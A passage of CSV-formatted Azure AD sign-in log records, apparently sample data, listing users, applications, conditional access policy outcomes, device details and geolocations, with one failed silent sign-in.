Online,93ca542e-4eab-45c4-8608-b71578d11400,SigninLogs,Sucess,33.7984581,-84.38828278
+943,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,31:56.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f1cc469f-40bc-0000-4704-a0f1df7d2df1,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:31,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",0cfe4b5b-09c7-4394-bb27-21b9cafd1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,0cfe4b5b-09c7-4394-bb27-21b9cafd1300,SigninLogs,Sucess,41.90428925,-85.99833679
+944,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:44.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8f205a00-e1f9-4f94-886a-fdd60925c83e,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:33,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Rich Client 3.19.7.16602'}",3c1797ce-9a4e-4e19-b7f0-81e01e2d1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.17196655273438, 'latitude': 38.73078155517578}, 'state': 'Virginia', 'city': 'Washington'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,3c1797ce-9a4e-4e19-b7f0-81e01e2d1400,SigninLogs,Sucess,38.73078156,-78.17196655
+945,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,52:55.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7f352042-575f-45eb-978d-dd7bf896bc1e,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:52,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",8d371308-4e1f-476f-97d6-c0ea65aa1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,8d371308-4e1f-476f-97d6-c0ea65aa1500,SigninLogs,Sucess,33.7984581,-84.38828278
+946,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,52:56.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,26f1c85e-311a-4f70-bdd7-b2a3ab085317,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:52,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",8d371308-4e1f-476f-97d6-c0ea76aa1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,8d371308-4e1f-476f-97d6-c0ea76aa1500,SigninLogs,Sucess,33.7984581,-84.38828278
+947,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:24.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ff4fc9e7-d216-4c6d-89ef-827f8c6c1d3a,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",f0d90a71-c139-4edc-9002-2dd75ef11200,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,f0d90a71-c139-4edc-9002-2dd75ef11200,SigninLogs,Sucess,50.6406517,5.572050095
+948,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,23:27.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,45752ec6-d8ad-4baa-8c09-74f14e78994c,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:23,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",429b44fe-fb38-41be-832c-f14284ae1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,429b44fe-fb38-41be-832c-f14284ae1200,SigninLogs,Sucess,41.90428925,-85.99833679
+949,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:23.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0c52f28e-0b5c-4e98-959c-95e67c2e07fe,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:34,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",f81997e3-0b26-42cc-8532-c4de867d1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,f81997e3-0b26-42cc-8532-c4de867d1500,SigninLogs,Sucess,33.7984581,-84.38828278
+950,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,25:05.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50058,None,The application tried to perform a silent sign in and the user could not be silently signed in. The application needs to start an interactive flow giving users an option to sign in. Contact app owner.,0,47266452-3790-4c50-bc98-96ceec494d00,Microsoft.aadiam,Microsoft.aadiam,,ee9ea8b3-5b09-4c36-8739-24856720b373,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,[],notApplied,08/04/2020 16:25,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",5710832e-d5f6-411b-b39c-0449242d1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],"{'errorCode': 50058, 'failureReason': 'The application tried to perform a silent sign in and the user could not be silently signed in. The application needs to start an interactive flow giving users an option to sign in. Contact app owner.'}",ee9ea8b3-5b09-4c36-8739-24856720b373,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,5710832e-d5f6-411b-b39c-0449242d1400,SigninLogs,Failed,33.7984581,-84.38828278
+951,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,22:36.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,68cc469f-b08c-0000-54b3-3f96967b505e,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, 